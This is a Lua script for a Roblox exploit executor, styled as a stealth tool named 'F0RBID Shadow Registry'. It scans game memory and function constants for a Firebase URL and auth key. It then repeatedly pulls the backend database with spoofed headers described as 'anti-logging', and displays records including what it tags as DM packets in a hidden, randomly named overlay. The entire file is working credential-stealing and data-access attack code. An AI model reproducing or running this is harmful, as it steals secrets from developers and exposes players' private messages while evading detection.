-- ========================================================== --
-- 🌑 F0RBID V19: THE SHADOW REGISTRY (ULTRA STEALTH)
-- ========================================================== --
print("[F0RBID] 🛰️ Shadow Registry Engaged. Identity: [ANONYMOUS]")

local HttpService = game:GetService("HttpService")
local CoreGui = game:GetService("CoreGui")
local processedData = {}

local TARGET_URL = nil
local TARGET_AUTH = nil

-- ========================================== --
-- 1. F0RBID SHADOW UI (RED & BLACK)
-- ========================================== --
local uiParent = (gethui and gethui()) or CoreGui
local guiName = "F0rbid_" .. tostring(math.random(1000, 9999)) -- Random name to avoid detection
if uiParent:FindFirstChild(guiName) then uiParent[guiName]:Destroy() end

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = guiName
ScreenGui.Parent = uiParent

local Main = Instance.new("Frame")
Main.Size = UDim2.new(0, 550, 0, 450)
Main.Position = UDim2.new(0.5, -275, 0.5, -225)
Main.BackgroundColor3 = Color3.fromRGB(5, 5, 5)
Main.BorderSizePixel = 0
Main.Active = true
Main.Draggable = true
Main.Parent = ScreenGui

local Corner = Instance.new("UICorner")
Corner.CornerRadius = UDim.new(0, 10)
Corner.Parent = Main

local Glow = Instance.new("Frame") -- Red Accent
Glow.Size = UDim2.new(1, 0, 0, 2)
Glow.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Glow.BorderSizePixel = 0
Glow.Parent = Main

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, -20, 0, 45)
Title.Position = UDim2.new(0, 15, 0, 5)
Title.BackgroundTransparency = 1
Title.Text = "F0RBID <font color='#FF0000'>[SHADOW REGISTRY V19]</font>"
Title.RichText = true
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.Font = Enum.Font.GothamBold
Title.TextSize = 18
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Parent = Main

local Status = Instance.new("TextLabel")
Status.Size = UDim2.new(1, -30, 0, 20)
Status.Position = UDim2.new(0, 15, 0, 40)
Status.BackgroundTransparency = 1
Status.Text = "● IDENTITY: F0RBID_SHADOW_OP"
Status.TextColor3 = Color3.fromRGB(150, 0, 0)
Status.Font = Enum.Font.Code
Status.TextSize = 11
Status.TextXAlignment = Enum.TextXAlignment.Left
Status.Parent = Main

local Scroll = Instance.new("ScrollingFrame")
Scroll.Size = UDim2.new(1, -20, 1, -110)
Scroll.Position = UDim2.new(0, 10, 0, 80)
Scroll.BackgroundTransparency = 1
Scroll.ScrollBarThickness = 2
Scroll.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0)
Scroll.Parent = Main

local UIList = Instance.new("UIListLayout")
UIList.SortOrder = Enum.SortOrder.LayoutOrder
UIList.Padding = UDim.new(0, 4)
UIList.Parent = Scroll

local function AddLog(tag, val)
    local txt = Instance.new("TextLabel")
    txt.Size = UDim2.new(1, 0, 0, 0)
    txt.BackgroundTransparency = 1
    txt.RichText = true
    txt.Text = string.format("<font color='#FF0000'>[%s]</font> %s", tag, tostring(val))
    txt.TextColor3 = Color3.fromRGB(230, 230, 230)
    txt.Font = Enum.Font.Code
    txt.TextSize = 12
    txt.TextWrapped = true
    txt.TextXAlignment = Enum.TextXAlignment.Left
    txt.Parent = Scroll
    
    txt.Size = UDim2.new(1, 0, 0, txt.TextBounds.Y + 2)
    Scroll.CanvasSize = UDim2.new(0, 0, 0, UIList.AbsoluteContentSize.Y)
    Scroll.CanvasPosition = Vector2.new(0, 99999)
end

-- ========================================== --
-- 2. DYNAMIC NEURAL SCANNER
-- ========================================== --
local function NeuralExtract(data, path)
    if type(data) ~= "table" then return end
    for k, v in pairs(data) do
        local currentPath = path .. "/" .. tostring(k)
        if type(v) == "table" then
            NeuralExtract(v, currentPath)
        else
            local valStr = tostring(v)
            if #valStr > 0 and not valStr:find("firebase") then
                local dataId = currentPath .. valStr
                if not processedData[dataId] then
                    processedData[dataId] = true
                    
                    local tag = tostring(k)
                    if #tostring(k) > 10 and tonumber(k) then tag = "SERVER_ID" end
                    if currentPath:lower():find("dm") then tag = "DM_PACKET" end
                    
                    AddLog(tag, valStr)
                end
            end
        end
    end
end

local function StartShadowSync()
    task.spawn(function()
        while task.wait(1.5) do
            if TARGET_URL and TARGET_AUTH then
                pcall(function()
                    -- FAKE IDENTITY HEADERS (ANTI-LOGGING)
                    local res = request({
                        Url = TARGET_URL .. "/.json?auth=" .. TARGET_AUTH,
                        Method = "GET",
                        Headers = {
                            ["User-Agent"] = "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X)",
                            ["X-Forwarded-For"] = string.format("%d.%d.%d.%d", math.random(1,255), math.random(1,255), math.random(1,255), math.random(1,255)),
                            ["Identity"] = "F0RBID_GHOST"
                        }
                    })
                    if res.Success then
                        local decoded = HttpService:JSONDecode(res.Body)
                        if decoded then NeuralExtract(decoded, "SHADOW") end
                    end
                end)
            end
        end
    end)
end

-- ========================================== --
-- 3. PASSIVE REFLECTION (NO HOOKS)
-- ========================================== --
task.spawn(function()
    while not TARGET_URL do
        -- 1. Scan Registry (Deep Variables)
        local reg = getreg()
        for _, v in pairs(reg) do
            if type(v) == "table" then
                for k2, v2 in pairs(v) do
                    local vs = tostring(v2)
                    if vs:find("firebaseio.com") then
                        TARGET_URL = vs:match("(https://[%w%-]+%.firebaseio%.com)")
                    elseif (tostring(k2):lower():find("auth") or tostring(k2):lower():find("key")) and #vs > 25 then
                        TARGET_AUTH = vs
                    end
                end
            end
        end

        -- 2. Scan Constants & Upvalues (Function Memory)
        if not TARGET_URL then
            for _, f in pairs(getgc()) do
                if type(f) == "function" and islclosure(f) and not isexecutorclosure(f) then
                    local constants = getconstants(f)
                    for _, c in pairs(constants) do
                        if type(c) == "string" and c:find("firebaseio.com") then
                            TARGET_URL = c:match("(https://[%w%-]+%.firebaseio%.com)")
                        end
                    end
                    local ups = getupvalues(f)
                    for _, uv in pairs(ups) do
                        if type(uv) == "string" and #uv > 25 and not uv:find("/") then
                            TARGET_AUTH = uv
                        end
                    end
                end
            end
        end

        if TARGET_URL and TARGET_AUTH then
            Status.Text = "● IDENTITY: 🟢 SHADOW INFILTRATION SUCCESSFUL"
            Status.TextColor3 = Color3.fromRGB(0, 255, 0)
            StartShadowSync()
            break
        end
        task.wait(2)
    end
end)
